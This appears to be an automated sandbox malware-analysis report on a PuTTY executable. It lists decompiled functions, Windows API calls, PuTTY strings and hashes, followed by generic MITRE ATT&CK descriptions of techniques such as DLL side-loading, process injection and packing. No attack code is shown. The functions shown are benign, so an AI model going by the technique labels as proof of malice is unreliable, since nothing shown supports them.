String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
API String ID: 1719414920-3903928787
Opcode ID: c3131025ae60de53865d4fdf28d78a2e67dc9ee2d0e22f1fe636d48f535718ce
Instruction ID: fb7912c6907c83d621319d870239d3426f66aae60420a99108d97e89ce00a50e
Opcode Fuzzy Hash: c3131025ae60de53865d4fdf28d78a2e67dc9ee2d0e22f1fe636d48f535718ce
Instruction Fuzzy Hash: 90019226B04546C9FA118B0BD9451796390BF8CBD4F948435CF4D873B1EE7CE486CB00

Function 00007FF6BB2BD470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

Part of subcall function 00007FF6BB2C6840: RegSetValueExA.ADVAPI32 ref: 00007FF6BB2C6873

RegCloseKey.ADVAPI32 ref: 00007FF6BB2BD4E7

Strings

Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00007FF6BB2BD4B7
%s@%d:, xrefs: 00007FF6BB2BD491

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Close$CreateValue
String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys
API String ID: 1009429713-1135138915
Opcode ID: 18f1472281709ed1ac5e0651156f3f95e79d3062a282c8181e1d00a7f7672173
Instruction ID: b23a02d2049986ebdcc50025bd748d8f5c05e30f81aec9eeeafa5f8f48121430
Opcode Fuzzy Hash: 18f1472281709ed1ac5e0651156f3f95e79d3062a282c8181e1d00a7f7672173
Instruction Fuzzy Hash: 3001D121B19A1640F921AB1AAA006F66B003F5DBD4F044230DF0C8B3E7ED3CE105C380

Function 00007FF6BB2871E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(?,?,?,?,00000000,?,00007FF6BB2BE2A6), ref: 00007FF6BB287235
MessageBoxA.USER32 ref: 00007FF6BB28726B

Strings

%s Error, xrefs: 00007FF6BB287249

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CursorMessageShow
String ID: %s Error
API String ID: 2689832819-1420171443
Opcode ID: 56ba602abdb3264e2971dc15fe112a15410bdf86c2fca282f0e8dd9a99c60566
Instruction ID: c54ffc0c09da8d57dfe2be6581848567e748ed6cb6bb6fc9c71e80e2cd1cc0bf
Opcode Fuzzy Hash: 56ba602abdb3264e2971dc15fe112a15410bdf86c2fca282f0e8dd9a99c60566
Instruction Fuzzy Hash: 61111C21A1CA4641FA00A719E99527E6790BF8D7D0F504535DA4D977B5EE3CE0528B00

Function 00007FF6BB28CF80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 00007FF6BB28CFDC

Part of subcall function 00007FF6BB286BD0: DeleteObject.GDI32 ref: 00007FF6BB286C21
Part of subcall function 00007FF6BB286BD0: DestroyIcon.USER32(00000000,00000000,00000000,00007FF6BB286077,?,?,?,?,00007FF6BB2FA920,?,?,?,?,00007FF6BB2C3528), ref: 00007FF6BB286C32
Part of subcall function 00007FF6BB286BD0: DeleteObject.GDI32 ref: 00007FF6BB286C5B
Part of subcall function 00007FF6BB286BD0: CoUninitialize.OLE32(00000000,00000000,00000000,00007FF6BB286077,?,?,?,?,00007FF6BB2FA920,?,?,?,?,00007FF6BB2C3528), ref: 00007FF6BB286C70

Strings

%s Internal Error, xrefs: 00007FF6BB28CFBB
Unsupported protocol number found, xrefs: 00007FF6BB28CFCA

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DeleteObject$DestroyIconMessageUninitialize
String ID: %s Internal Error$Unsupported protocol number found
API String ID: 1151367991-184558026
Opcode ID: aaf80368ca53954cd90d1eb702873e0f1aa82ef3957093735d968e88b12884d8
Instruction ID: 25f80fb35f2723edb0c7b2e07cf579306c5c1c5b186a3b2820e73d6f137bc0bc
Opcode Fuzzy Hash: aaf80368ca53954cd90d1eb702873e0f1aa82ef3957093735d968e88b12884d8
Instruction Fuzzy Hash: D4F01720E0C50381FA59676DAA163B91291BF5C780F544836D70ED7BF6EE7CE942C741

Function 00007FF6BB287360 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32 ref: 00007FF6BB28739E
MessageBoxA.USER32 ref: 00007FF6BB2873BE

Strings

%s Fatal Error, xrefs: 00007FF6BB287370

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CursorMessageShow
String ID: %s Fatal Error
API String ID: 2689832819-656502033
Opcode ID: a2749117da2887429898ccd120d4ea602f02c449e378dd858b602a06e12f8fa0
Instruction ID: 91d792c1d52539ccc6654f18f6c05f1e1d09ab667ec898bd47d3036ff5b988d2
Opcode Fuzzy Hash: a2749117da2887429898ccd120d4ea602f02c449e378dd858b602a06e12f8fa0
Instruction Fuzzy Hash: 3B012524E0954681FA05A72AEE853BD2651BF8C7E0F544431CF0DC7BB1EE7CE4828B11

Function 00007FF6BB2BD020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

RegDeleteKeyA.ADVAPI32 ref: 00007FF6BB2BD06B
RegCloseKey.ADVAPI32 ref: 00007FF6BB2BD07B

Strings

Software\SimonTatham\PuTTY\Sessions, xrefs: 00007FF6BB2BD033

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Close$CreateDelete
String ID: Software\SimonTatham\PuTTY\Sessions
API String ID: 3931322244-490553574
Opcode ID: 4b1984fb7c262d7d20289c66f2bcf03e70f15f26a06c3254bc2e2c9ddc0dde6e
Instruction ID: 02444071bb074d1cc810cf23730014b9e21ab7ef82d0306abf55dfb285916861
Opcode Fuzzy Hash: 4b1984fb7c262d7d20289c66f2bcf03e70f15f26a06c3254bc2e2c9ddc0dde6e
Instruction Fuzzy Hash: 33F09016E6D11200FD15A72A7B113FA56402F8DBE4E044530EF1D8B3EBED3CE0868340

Function 00007FF6BB2A4550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 00007FF6BB2A4592

Strings

%s Log to File, xrefs: 00007FF6BB2A4575
The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 00007FF6BB2A455A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Message
String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
API String ID: 2030045667-4035860868
Opcode ID: 4071ffa8d5801d8dd27bb9270e83132bbb393405316b465ce236d166e412b705
Instruction ID: c6f79106a80f36b1404a9c5781c70547e5b22afe557ec1d939a02a5311def6a3
Opcode Fuzzy Hash: 4071ffa8d5801d8dd27bb9270e83132bbb393405316b465ce236d166e412b705
Instruction Fuzzy Hash: 3BF06D62F1C20246FA04676AAA861FA0690AF4CBC0F044831DE0EC77A2EC3ED9828300

Function 00007FF6BB2FA930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,?,?,?,00000000,shell32.dll,00007FF6BB2C62CE), ref: 00007FF6BB2FA948
GetSystemDirectoryA.KERNEL32 ref: 00007FF6BB2FA9A3

Strings

shell32.dll, xrefs: 00007FF6BB2FA930

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DirectorySystem
String ID: shell32.dll
API String ID: 2188284642-3366042328
Opcode ID: a9ee6e6a45bb18eb539bbc573f5280d7ea934189f6e788fef1dc6c60c4baa7fd
Instruction ID: c2723e187985eb819bd1a60b4873af4b8b53035512eada0e10145ab048951cdc
Opcode Fuzzy Hash: a9ee6e6a45bb18eb539bbc573f5280d7ea934189f6e788fef1dc6c60c4baa7fd
Instruction Fuzzy Hash: DF01C830A0CA6285FA509B19A91877D67A0FB9D798F324534CA4D873B8CF3CA5868B00

Function 00007FF6BB2B4F6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

SetCommState.KERNEL32 ref: 00007FF6BB2B4FDE
SetCommTimeouts.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5000
GetLastError.KERNEL32 ref: 00007FF6BB2B500E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF6BB2B4C35), ref: 00007FF6BB2B5024

Strings

Configuring %s flow control, xrefs: 00007FF6BB2B4FC7

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CommErrorLast$StateTimeouts
String ID: Configuring %s flow control
API String ID: 274883806-3277764455
Opcode ID: 719437e26983418da532ba82bb22c9a866490e0860abca4019a22f30a6799b5c
Instruction ID: 5549a32d228f1af816e5e49c7f131cc58c05939ac71c0513ae452a42d1f70659
Opcode Fuzzy Hash: 719437e26983418da532ba82bb22c9a866490e0860abca4019a22f30a6799b5c
Instruction Fuzzy Hash: 07F0A422E0C60381FD319B19E55017A6350BF8CB84F855231DF4D9A664DE7CE685CB40

Function 00007FF6BB2B4E30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF6BB2F9A72

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c, xrefs: 00007FF6BB2F9A48
h->type == HT_INPUT, xrefs: 00007FF6BB2F9A41

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Event_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h->type == HT_INPUT
API String ID: 1844187620-945550184
Opcode ID: 34eab87568b2f97d5e78bd25981b66ade2e13560c7c1c26ef2be028d2d195b8c
Instruction ID: 93ed42fbc898fda05863bb99df0fa2c72a62a78385e8869f60c1c6a075943dda
Opcode Fuzzy Hash: 34eab87568b2f97d5e78bd25981b66ade2e13560c7c1c26ef2be028d2d195b8c
Instruction Fuzzy Hash: 2CF06D12F0818696FF75971DE9663BC26A0BF8C7A4F444131CB4E826B1AE3DE985C701

Function 00007FF6BB2A2770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32 ref: 00007FF6BB2A27A4
SetWindowPlacement.USER32 ref: 00007FF6BB2A27C5

Strings

,, xrefs: 00007FF6BB2A2797

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: PlacementWindow
String ID: ,
API String ID: 2154376794-3772416878
Opcode ID: 34904950a220999ec0423ff86c56704a8530e7483fd0998e732b076502d803ce
Instruction ID: 9ae432b0b6a77111e25361faa50947d43244b668dcc5a60e5f964454c13d5acb
Opcode Fuzzy Hash: 34904950a220999ec0423ff86c56704a8530e7483fd0998e732b076502d803ce
Instruction Fuzzy Hash: CFF0A421A0C68585FB109728F84433D7790FB5D794F145134EA8D866B4CFBCE185CF00

Function 00007FF6BB2A4630 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 00007FF6BB2A466C

Strings

You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 00007FF6BB2A463D
%s Key File Warning, xrefs: 00007FF6BB2A464F

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Message
String ID: %s Key File Warning$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
API String ID: 2030045667-89788609
Opcode ID: 6215c22df2732eb043877ea78f935724e3277a6e05f0dee94eba0e3ea98729bb
Instruction ID: 0fba826ef974b25906421289e9445128ccc26a16b2088abd8ef219cc2792181c
Opcode Fuzzy Hash: 6215c22df2732eb043877ea78f935724e3277a6e05f0dee94eba0e3ea98729bb
Instruction Fuzzy Hash: 03E03911F0D55281F904632EAA594BA53917F4DBD0B009C31DF0E9BBB6AD2EE9478340

Function 00007FF6BB2C6250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851AE), ref: 00007FF6BB2C6298

Strings

kernel32.dll, xrefs: 00007FF6BB2C6276
SetDefaultDllDirectories, xrefs: 00007FF6BB2C628E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc
String ID: SetDefaultDllDirectories$kernel32.dll
API String ID: 190572456-2102062458
Opcode ID: eb0009f07433d116b1c8e27a53c1bbb2b14a0e9088aa7095047305abeeee04a3
Instruction ID: c2c8b114cdc9a3d5db5e2b8d1409ef486699eaf048ef6e7e8c26b9616f53df91
Opcode Fuzzy Hash: eb0009f07433d116b1c8e27a53c1bbb2b14a0e9088aa7095047305abeeee04a3
Instruction Fuzzy Hash: DDF0D410E0AB0384FE5A8B4DAE5133426A0BF5C300FA40939C60CC23B1EE7CE8998702

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
